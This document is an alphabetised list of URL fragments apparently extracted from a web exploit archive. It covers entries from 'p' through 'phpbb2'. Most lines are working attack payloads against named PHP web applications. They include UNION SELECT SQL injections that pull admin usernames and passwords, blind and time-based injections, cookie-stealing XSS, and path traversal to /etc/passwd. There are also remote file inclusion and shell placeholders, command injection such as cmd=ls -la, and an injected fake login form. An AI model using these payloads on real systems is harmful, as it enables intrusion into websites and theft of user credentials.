/?p=215
P22_QuickTreeView.NET.aspx?Tabopen=                          ¦       ¦                                       ¦
p3
/?p=3
/?p=346
/?p=350
/?p=3<FORM action="Default.asp?PageId=-1" 
p47h
P47H
/?p=497
p4CMS.v1.05.Nullified-WTN.rar      
[p4th]
/?p=510
p68_Starmail-2-0-Paidmail.html
 -p 75.34.123.215:9629       #
/?p=818
pabugs pa 1              |\n";
[pabugs_path]
pacenoge.org
pacenoge.org #
pacercms
pach
{PACH}
pack%20complet%20V1.0
package
packagedetails.php?pid=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12%23
packagedetails.php?pid=4[BLIND SQL-INJECTION]
packagedetails.php?pid=4+[BLIND SQL-INJECTION]
packagedetails.php?pid=4+[SQL-INJECTION]AND+substring(version(),1)=5
/?package_ID=[SQL]
package-list"
package-list">
packages
packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23
packages.php?spt=10 (or demo site)
packages.xml
packetstormsecurity.org
/?p=add_news_information
paddys.tk" type="text"><
pafaq
pafaq"; exit; }
pafiledb
pafiledb_constants.php?module_root_path=[Shell]
[pafiledb_dir]
pafiledb.php?action=..
pafiledb.php?action=admin&login=do&formname=-99'%20UNION
pafiledb.php?action=category&id=1&filelist=%22%3E%3C
pafiledb.php?action=category&id=1&pages=%22%3E
pafiledb.php?action=category&start='&sortby=rating
pafiledb.php?action=download&id=4
pafiledb.php?action=download&id=4?"&lt;script&gt;alert('Testing')&lt;
pafiledb.php?action=email&id=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B<
pafiledb.php?action=email&id=4?"<script>alert('Testing')<
pafiledb.php?action=rate&id=4?"&lt;script&gt;alert('Testing')&lt;
pafiledb.php?action="><script>alert();<
pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
pafiledb.php?action=viewall&start=20&sortby=name%22
pafiledb.php?action=viewall&start='&sortby=rating
pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
pafiledb.php?news=showcontent&newsid=[SQL] 
pafiledb.php?"><script>alert();<
pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
pafiledb.php?[something]="><script>alert();<
pafiledb.php?[something]=&[something]="><script>alert();<
pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1
pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(user(),0x3A3A3A,database()),5,6
pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1
pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6
/?pag=articolo&id=">
/?pag=articolo&id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8--
page
/?page=
/?page=..
/?page='
".$page."
page?  #
[PAGE]
*&page=0&view=collapsed&sb=5&o=&fpart=1 
/?page=-0x90+union+select+0,0,password,0+from+user
/?page=-0x90+union+select+0,0,secret,0+from+user
/?page=-0x90+union+select+0,0,useremail,0+from+user
/?page=-0x90+union+select+0,0,username,0+from+user
/?page=1
page_1
/?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C
/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
page5.html
/?page=addgb&mod=gaestebuch
/?page=admin
/?page=admin&id=1'[SQL]
/?page=admin&id=INJECT HERE
page_admin.php?MOA_PATH=[AvriLhea]          
/?page=admin&start=">
page?";alert(document.cookie);
/?page=avatars&op=delete&id=1&mode=J');
pagecache.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
/?page=category&category_id=1&viewmode=img&batch=%22%3E%3Cscript%3Ealert('r0t')%3C
/?page=configure&id="><script>alert(document.cookie)<
pagecontent.php?PT=..
/?page_courante=..
page.de
pageDescriptionObject.php?LibDir=[inj3ct0r sh3ll]
pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20-[SQL-INJECTION!]
/?page=details&prod=2&cat=1&page_id=14
/?page=download
/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
/?page=editattributes&id=1'[SQL]
pageedit.php?id=%27
/?page=employees:main
/?page=eventlog&s=0&filter="><script>alert(document.cookie)<
/?page=eventlog&start=&delete="><script>alert(document.cookie)<
/?page=eventlog&start="><script>alert(document.cookie)<
page_forgot.php?apps_path[themes]=[RFI]
page,free
page_gallery_add.php?MOA_PATH=[AvriLhea]          
page_gallery_view.php?MOA_PATH=[AvriLhea]          
page.html?pid=1 and 1=1 TRUE
page.html?pid=1 and 1=2 FALSE
page.html?pid=[bSQL]
/?page_id=11
/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users
/?page_id=13&album= [exploit]
/?page_id=14
/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts
/?page_id=20
/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
/?pageid=214
/?page_id=3
/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0
/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0
/?page_id=3&wpforumaction=search
/?page_id=3&wpforumaction=search'
/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1
/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0
/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1
/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0
/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1
/?page_id=4
/?page_id=40
/?page_id=71
/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1"
/?page_id=9
PAGE_ID" method="post" name="main">
/?page_id=[page_id]&vasthtmlaction=search" method="post" name="main" >
/?pageid=<script>alert("Cr@")<
/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
page_image_add.php?MOA_PATH=[AvriLhea]          
page_image_view_full.php?MOA_PATH=[AvriLhea]          
page.js"><
pagelayout.inc.php?c[path]= [inj3ct0r sh3ll]
page_list
*   #page loaded whit any data and some error that say
*   #page loaded whit any data and some error that say "The user has hidden their blog."
/?page=login.html
page_login.php?MOA_PATH=[AvriLhea]          
/?page=logout" alt="Do you see this?" 
pagemanager
[pagemanager_path]
/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1
pagename.php?cmd=shell<
/?page=newscat&catid=-666%20union%20select%20passwd%20from%20user
pagenumber.inc.php
pagenumber.inc.php?archiv=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B<
pagenumber.inc.php?archiv=indoushka@hotmail.com&subcat=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B<
/?page=order
page.php?action=delete&page_id=[VID]
page.php?action=;phpinfo();
page.php?action=view&id=1<script>alert(document.cookie)<
page.php?id=..
page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
page.php?id=14+AND+1=0%23   [ True ]
page.php?id=14+AND+1=1%23  [ False ]
page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+
page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.c?olumns+where+table_name=char(table_cod)
page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users
page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3
page.php?ID=34
page.php?id=-999+union+select+1,2,3,4,5,6,7,@@version
page.php?id={EV!L EXPLO!T} 
page.php?id=[Injection Query]
page.php?id=[shell]
page.php?id=[SQL]
page.php?id=[SQL*]
page.php?id=<SqL Code>                  #
page.php?id=[sqli]
page.php?id=[SQli] 
page.php?id=SQLi
page.php?id=[SQLi]
page.php?message=<script>alert(document.cookie);<
page.php?name=
page.php?name=-1%27%20union%20select%200,0,0,0,0,0,0,0,0
page.php?nc=vbvb&id=-1 union select 0,concat(nom,0x3a,passe),2,3+from+infos--
page.php?p=1&img=-1+UNION+ALL+select+1,2,3,4,5,GROUP_concat(CONVERT(num USING utf8),0x3a,CONVERT(user USINGutf8),0x3a,CONVERT(pswd USING utf8)),7,8,9,10,11,12,13,14+from+adm_user
page.php?p=1&img=-207+UNION+ALL+select+1,2,3,4,5,GROUP_concat%28CONVERT%28num%20USING%20utf8%29,0x3a,CONVERT%28user%20USING%20utf8%29,0x3a,CONVERT%28pswd%20USING%20utf8%29%29,7,8,9,10,11,12,13,14+from+adm_user
page.php?p=1&img=[N.A.S.T ]
page.php?page=..
page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C
page.php?page_id=139
page.php?page_id=139[SQLi]
page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--    |
page.php?pageid=1&zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1
page.php?page_id=[SQL]                                                          |
page.php?page=[SQL] 
page.php?page_type=catalog_navigate&type_id[]=-99%20union
page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search 
page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search
page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
page.php?xPage=..
page.php?xPage=<SCRIPT>alert(document.cookie)<
[page].pl
/?_page=product_cat:t_Paged%20Listing&id=1[SQL] 
pages
pages_data.php?action=add&id="; 
pages_data.php?action=delete&id="; 
pages_data.php?action=edit_saved&id="; 
 page__section__ ..
/?page=send&id=1&tab=Format" name="sendmessageform">
/?page=shop
page_show.php?id=18--->SQL
page_sitemap.php?MOA_PATH=[AvriLhea]          
page_slideshow.php?loc_id=1"><
pages-new-save">
pages.php
pages.php?do=pages&id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271
pages.php?fid=0,1,356
pages.php?fid=0,1,362
pages.php?fid=0,13&pp_id=38[SQL]
pages.php?fid=0,1,472&pp_id=83[SQL]
pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list
pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--
pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins
pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--
pages.php?idpages='SQLINJECTION
pages.php?id=[SQL]
pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin
pages.php?op=edit&id=16&form_id=2'
pages.php?page_ID=-9999%20union%20select%201,2,3,4,5,6,7,8,9,group_concat(username,0x3a,password,0x3a,user_accesslevel),11,12,13,14,15,16%20from%20user--
pages.php?page_ID=[SQL]
pages.php?page_name=[SQLi]
pages.php?page_name=union_select_password_from_members
pages.php?page='union
pages.php?pid=-9999'
pagesquid
[pagesquid_path]
/?page=staff?=add" method="post">
/?page=staff?=delete&do=root&confirm=1" alt="Do you see this?" 
/?page=store
pages_t_users
/?page=tax
/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
/?pagetitle=w00t><
pagetool
pageToolBar
pagetreecms.co.cc
/?page=users&find="><script>alert(document.cookie)<
/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)--
/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)--
/?page=vendor
pagination.php 
pagode
[paht]
paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--
paidbanner.php?ID=[sql]
paid-downloads
 ( Paid Script )
paidversion
paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--
paises.php?id=-1+UNION+SELECT+1,USER()--
pakupaku
palcastle.org
pal-pal-shop-digital.html
pandora
Pandora%20FMS%203.1
pandora_console
Pandora_FMS
pandorafms.org
pandora_help.php?id=
[PANDORA PATH]
pandora.sapzil.info
panel
paneladmina.php?result=usr_level&player=PLAYER&authlvl=3
panel_editor.php?aid=e017e24eb00e8ccf" method="post">
panel?err=Please Login Again<br><font color="black"><form method="POST" action=[Your Page That Saves Data]>Username: <input name="user"><br>Password: <input name="pass"> <br><input type="Submit" name="subit" value="Login"><noscript> 
panews
pang057.zz?cmd=";
pang0.by.ru
paobacheca
papers
 papipsycho\n\n";
[papoo_dir]
papoo-sicherheitsmeldung-07-2009.html
paradox.altervista.org 	 #  	                 			  #
para_langue.php 
 parameter(s) 
/?[params]
params.php?gszAppPath=[EvilScript] 
ParamValuesEditor.class.php
parents
parents.php?func=mailto&ADD=-1%27+UNION+ALL+SELECT+concat(client_id,0x3A3A3A,client_pw)+FROM+ADMINS+WHERE+id=%271
parents.php?func=mailto&ADD=-1%27+UNION+ALL+SELECT+user()%23
parents.php?func=showreportcard
parents.php?func=showteachermemo";
parents.php?func=showteachermemo HTTP
/?parent=[SQLi]
paristemi
parohija.php?id=
parohija.php?id=-999+union+all select+1,2,3,4,5,version(),user()--
parohija.php?id=<marquee><font color=red size=15>XroGuE<
parser
parserfactory.class.php
parser.php?file=
parser.php?file=\..\..\..\..\..\..\..\..\..\..\boot.ini%00.gif
parser.php?file=<script>alert(document.cookie)<
parser.php?path=[Bad Code]
part
particle-wiki-sql-inj.html
partie_administrateur
partner
_partner_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);<
Partners
part_userprofile.php?template_path=[Shell]
partymgr
pas.php?id=
pas.php?id=-999+UNION+SELECT+1,2,version(),user(),5,database(),7,8,9,10,11,12,13,14,15,16
pas.php?id=<marquee><font color=red size=15>XroGuE<
passcracking.ru
pass_dirs.php?plan_id=35&domain=[SQL]
pass_dirs.php?plan_id=[SQL]
pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'
passdownload.php?downloaddata=3
pass.html" method="post">
passing-malicious-php-through-getimagesize
pass.php" method="post" 
pass.php" method="post" name="main" 
passthru.php
passthru.php?func=delete&area=transcript&person=00002&transcript=..
passw%00
passwd
passwd`
passwd 
passwd >
passwd                +
passwd       *
passwd', '
passwd"
passwd";
passwd),
passwd\0
passwd]%00
passwd%00
passwd%00 
passwd%00  
passwd%00        
passwd%00                   
passwd%00 [[
passwd%00"
passwd%001234
passwd%00&bn=fm_d1 
passwd%00.css
passwd%00.css 
passwd%00&ewiki_action=1
passwd%00&file=frontend.js&language=en
passwd%00.htm
passwd%00.html
passwd%00.html"
passwd%00 HTTP
passwd%00&id=12
passwd%00&id=-1_tsearch_len
passwd%00&inc=dataset_details&dataset_id=625
passwd%00index&q=About&ajax=true&_=1355779988
passwd%00.jpg
passwd%00.js
passwd%00.js;
passwd%00&login=do 
passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=1
passwd%00" method="post" name="main">
passwd%00&path=
passwd%00.php
passwd%00.png"
passwd%00Qabandi%00Was%00Here
passwd%00&query=1&search=Search 
passwd%00&ref=1 
passwd%00&SUBMIT=%20%20Submit%20%20
passwd%00&theme=passwd%00
passwd+%26&submit=Ping%21 
passwd'),4,5,6,7,8,9
passwd'),8
passwd'),8+from+mysql.user
passwd . boot.ini
passwd&download=1
passwd edit\n";
passwd    |etc...
passwdform.inc.php?reason=<script>document.write("<img src='hacker.com
passwd HTTP
passwd&id=1 
passwd johndoe s3cr3t"
passwd\")'\n";
passwd\"\n";
passwd\n";
passwd\n\n";
passwd&NumLoops=1 
passwd&op=fileviewer
passwd&page=&section=pages
passwd&passed_id=1&
passwd?password=<>&domain=<>&user=<>
passwd&pathext=pub
passwd&pathext=&u=&&copt=1&sortKey=2 #
passwd&RequestID=DUMMY&username=blah&password=blah 
passwd\r\n\r\n";
passwdt
passwd&thumbnail=FALSE
passwd&view=print 
passwd(will
passwiki
passwiki.php?site_id=..
passwo.php";
password
* - password #
Password
Password");
password,1
password_2.php" method="post" target='_top'>
password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
password_check_token.php?token=1&f_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
password.dat the password
*&password=foobar 
passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
password" method="post" enctype="multipart
*&password=nothing
password.php
Password.php
Password.php"
password.php?GlobalSettings[templatesDirectory]=evill
Password.php HTTP
password.php" method="post" class="UpdateProfileForm">
password_protect_enhanced
 [Password Protect_PATH] 
password_recovery.php?=1".$query, HttpRequest::METH_GET);
password_reminder.php
password_reminder.php?forgot=Email+Reminder">[code]
password_required.html
password_reset
passwords.php
 password users userID=1\n\n";
password with http request editor The POST variable frmQuestion has been set to 1' 
pastel.pri.ee
patch
[patch]
$patch
[patch_aplication]
patch_edit.php?myown_patch_id=1 and(select 1 from(select count(*),concat((select (select login) from `ac_users` limit 1,1),floor(rand(0)*2))x from `information_schema`.tables group by 2)j)
patches
Patches
[patch]lib
'.$patch_mybb.'
patForms
path
~path
<path>
 [path] 
_path]
/?path=..
' +path
' +path+ '
'.$path.'
".$path."
"+path+"
[path
[ path ]
[path]
[path]<
[path]"
]path]
{$path}
{path}
$path
${path}
path<
path]
path]<
path]: ";
[patH]
[paTh]
[pAtH]
Path
<=- Path -=>
 [Path] 
[ Path ]
[Path]
$Path
Path: ";
PaTh
[PaTh]
{PATh}
PATH
 [PATH]
 [PATH] 
[PATH]
{PATH}
/?path=..%2F..%2F..%2F%2F..%2F..
/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd 
path2phpshell
[path]administrator
[path_advanced_poll]
$PATH""article.php?op=favorite&article_id=4&page_id=-1'
Path       : ";chomp(my $target=<STDIN>);
Path   : ";chomp(my $target=<STDIN>);
[PATH CMS]
/?path=cwh&p=..
pathdir
path_disclosure_in_comment_rating_wordpress_plugin.html
path_disclosure_in_eocms.html
path_disclosure_in_habari.html
path_disclosure_in_kaibb.html
path_disclosure_in_lightneasy.html
path_disclosure_in_mybb.html
path_disclosure_in_phpcollab.html
path_disclosure_in_podcast_generator.html
path_disclosure_in_redaxscript.html
path_disclosure_in_runcms.html
path_disclosure_in_syndeocms.html
path_disclosure_in_viscacha.html
path_disclousure_in_dalbum.html
path_disclousure_in_phpmysport.html
path] [id]\n";
[Path]index.php?flag=[Local File]%00
[path]index.php?page=admin&act=categories&func=delete&id=5
[path]index.php?page=admin&act=categories&func=delete&id=[CatID]
[path]index.php?page=admin&act=groups&func=delete&id=2
[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]
[path]index.php?page=admin&act=members&func=ban&id=4
[path]index.php?page=admin&act=members&func=ban&id=[UserID]
[path]index.php?page=admin&act=members&func=delete&id=4
[path]index.php?page=admin&act=members&func=delete&id=[UserID]
[path]infusions
 || $Pathloader!~
pathmaplab
$PATH""modules.php?name=Top&querylang=union
$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line 
[path]\n";
path \n" unless @ARGV;
path_of_blog
path_of_hola
pathofhostadmin
[Path of Monkey CMS]
pathofstellardocs
pathofstorebuilder
pathofzorum
pathos
".$paths."
 path script 
 (Path Script) 
[PATH-SHELL]
path] [table_prefix] [id]\n";
pathto
path.to
path to actualanalyzer
path to aimstats
[pathToApplication]
[path_to_atutor]
[path_to_bitweaver]
path_to_bitweaver
[path_to_blog]
[pathtobwired]
pathtocalendar
[path_to_claroline]
 || $Pathtocmd!~
path_to_CMSBalitbang
path_to_cp
[path_to_cubecart]
[path_to_dotclear]
pathtoeqdkp
[path_to_etomite]
[path_to_flatnuke]
path_to_gb
path_to_geeklog
[path to geoblog]
[path_to_guppy]
pathtohackingscript?&cmd=id 
[path_to_jaws]
path to joke script
[path to kwalbum]
[path_to_limbo]
path_to_limbo
[path_to_linksCaffe]
path_to_lokomedia
[path_to_mambo]
pathtomyreview
[path_to_nodez]
[path_to_nucleus]
path_to_oSCMax
path.to.our.php.file-nothing-important
[path_to_papoo]
path_to_pem
[path_to_phpbb]
[path_to_Php_Fusion]
path_to_phpizabi
[path_to_phplist]
path-to-phplive
[path_to_phpwebthings
Path_To_pMachine
path to read any readable (to the uid of the httpd process) file on the filesystem. The information gained may make it easier to compromise the system in other ways.
[path to ripe]
[Path to RiteCMS]
[path_to_runcms]
(path to script)
[Path to scry gallery]
path to site
path_to_store
path_to-store
[path to store image]
[path_to_tcexam]
PathToUPB)<
PathToUPB  (no trailing slash)<
PathToUPB  [no trailing slash]) (user database in 
path_to_webadmin
[pathtowebapp]
path_to_webEdition
path_to_Weblogicnet
[path to XCMS]
[path_to_xhp]
[path_to_xoops]
path-to-yapig
[pathtoyourphpMyVisites]
[path_TUTOS]
[path] [username] [password] [target id]\n";
'+ path +'viewpost.php?postID=1')
pathwirte.php?FSPHP_LIB=[evilc0de]
[path_wordpress]
patient
patient_file
PATIENTID
[Pats]
[PaTs]
patux.net
payment.html
payment_method_form&payment_method_id=1' and '1'='1
payment.php?insPath=[evil_script]
payment.php?page_id=..
payment.php?page_id=[LFI]
payment_process
paymentprocessorscript.net
payments
".$payName);
".$payName."%00", $cookie);
paypal
pay.php    
pay-with-tweet.php
pbb
pbb_manual
pbbooking
pbcs-0.7.1-1
pbcs_download.php
[pbd_path]
pbeacon_path]
pb_inc
pbl
pblang
PBLang%204.67.16.a%20no%20graphics
[pblang_path], u can 
 "pblcookie732128=Pe
pc
pc4up
pc4uploader
/?p=cat&c=..
/?p=cat&c=<br>jiko <script>alert(11)<
pclasp
pclphp.asp
pcltar.lib.php?g_pcltar_lib_dir=..
".$p."?cmd=$cmd\n[+] For your own commands.. \n[+] The Result Of The Command\n";
pcmsite.net
 -p=cms_\n";
pda
pda_projects.php?offset=[AvriLhea]
pdf.php
pdf.php?action=show&start=20[SQL-INJECTION]*&keyword=&search_area=
pdf.php?category=[r0t]
pdf.php?config[pdf_module]=)<br>"
pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7
pdf.php?lng=cmd.php
pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
pdo.inc.php?sql= [inj3ct0r command]
pdo.inc.php?sql= [inj3ct0r command] 
/?p=download
/?p=draw-edit&id='
/?p=draw-view&id='
pear
PEAR
PearDb.php
PEAR_DIR
PEAR.php
pear.php.net
pec
pec_admin
p;echo%20%27trixbox%3d%22trixbox%22%27>>config.php%0d%0a" &>
p;echo%20%5c%5busers%5c%5d>config.php%0d%0a" &>
pecio-cms-v205-template-multiple-remote.html
pecio_path
pec_templates
pec_upload
p-editbox.php?pathfile=
p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5
p-editpage.php?pathfile=
p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5
peel
peel-v29-4308.html                                                                                
PendingAccountsPage.class.php?base_path=[evil_scripts]
PendingOrdersPage.class.php?base_path=[evil_scripts]
penetration-testing
penguin
pentagon.gov
pentesters.ir<
pentesting
pentest.localhost
pentestmonkey.net
pen_users
people
peopleablaze.net
people.ee.ethz.ch
PeopleHtmlSearchRenderer.class.php?gfwww=[Shell]
people.php?person=1>"><ScRiPt%20%0a%0d>alert(404385187829)%3B<
PeopleSearchQuery.class.php?gfcommon=[Shell]
pepowned.free.fr
pepper
pepsicms
performanceschedule.php?theme=..
performs
periode.class.php?path_om[Shell]
perm='1
&permalink=passwd
permalink.php?id=9+and+1=1 TRUE
permalink.php?id=9+and+1=2 FALSE
permalink.php?id=[bSQL]
Permanent-Double-Side
permanent.eventMonth.inc.php?lang_path=[cmd_url]
permission=0x414C4C
Permission.class.php?gfcommon=[Shell]
permissions.php?group_id="><script>alert(123);<
permissions.php?role_id="><script>alert(123);<
permissions.php?selected_group="><script>alert(123);<
permissions.php?user_id="><script>alert(123);<
perm_sql.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
Persian
persian.rar                              #
"><[PERSISTENT INJECTED SCRIPT CODE]"' class="icon" style="
person
person--
personel
personenseiten.php
person.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,2,3,4,version(),6,user(),version(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
pet
petgroom
petition
petitionbook
petition.php
PetRatePro
pfadmin
/?p=[file]
pfNewsDetail.php?NewsId=[SQL]
pfooter.php?theme_root=[Evil_Script]
pforum
 -p=forum_ -id=2\n";
pfsense_url
pg
pgallery
/?pg=evilcode?&cmd=id
pgmreloaded
pgmreloaded-0.8.5.tgz
pgosd
pgosd.tgz
pg-portal-pro
pgrfilemanager
PGRFileManager.php 
/?p=grounds-add
pgsql.class.php?gfcommon=[Shell]
ph
phaosrpg
pharma1
pharmacysystem
phase
phase4.php?privilege_root_path=[
phd
phd%202.12
phd_released
pheader.php?theme_root=[Evil_Script]
Pheap
phenix
phenix-35b-5503.html
_phenotype
phgstats
philex
philex_0.2.3.tgz
philippK-de
phlasteename.rm
ph-logo.png" width="120" height="121"><
phlymail.de
phnntp
phoenixviewcms
phonebook.php
PhoneDirectory.php?ID=1 [SQL INJECTION]
PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
phormation
phorum
phorum5
phorum5012
phorum_load.php?GLOBALS[g_campsiteDir]=[SHELL]
phorum.org
[phorum_path]
phosheezy
photo
photo_album
PhotoAlbum
photo_album.php
photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users
photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users
photo_album.php?alb_id=[N.A.S.T ]
photo-battle
PhotoCart
photodiary
photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,1+from+PHOTO
photo-flash-gallery
photogallery
photo-gallery
photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--
photogallery_show.php?id=-1
photography-on-the.net
/?photoID=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version()),2%23
photo.php?apa_album_ID=2&apa_photo_ID=-9999 union all select 1,concat(0x3a,nickname,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from apa_users--
photo.php?apa_album_ID=2&apa_photo_ID=<script>alert(1)<
photo.php?h=><script>alert(document.cookie)<
photo.php?id=1"
photo.php?id=%InjectHere%
photo.php?id=%injectHere%19
photo.php?w=><script>alert(document.cookie)<
photopost
photoracer
photo-rigmabiz
photos
Photos
photos-a-images
photosharing_script.html
photos_images_uploadscript.html
photosite
photo.sourceforge.net
photos.php
photostand_1.2.0
photostore
photo_[user_id].jpeg%00&cmd=ls%20-la
photovideotube-v1.1.html ]
php
.php
PHP
php121
php121db.php?php121dir=[ File ]%00
php121db.php?php121dir=[ Local File ]%00
php121_editname.php?uid=[sqli]
php354.tmp1140521343.att%00&cmd=ls%20-la
PHP_5_2
phpaaCMS
phpaa.cn
phpabook
phpaccess
phpaccounts
phpaddedit
php-addressbook
php-addressbook.sourceforge.net
phpadsnew
[phpAdsNew]
phpadsnew_11.html
phpadventure
phpagenda
php-agenda
php-agenda.sourceforge.net
phpAlbum
phpamx
php.annoncesv.1895.html
phpartenaire
php_article_publisher
phpatm
phpATM
phpATM_130
phpatm.free.fr
phpatmviewers
phpauction
phpauction-gpl-3.2
phpauctions.info
phpauth.sourceforge.net
&PHP_AUTO_LOAD_LIB=0 
phpautomembersarea
phpautovideo
phpautovideo#
phpay.de
phpay.sourceforge.net
phpayv2.02
phpayv2.02a
phpbandmanager
php-barcode
phpBazar-2.1.1fix
phpbb
phpBB
[phpBB]
phpbb2
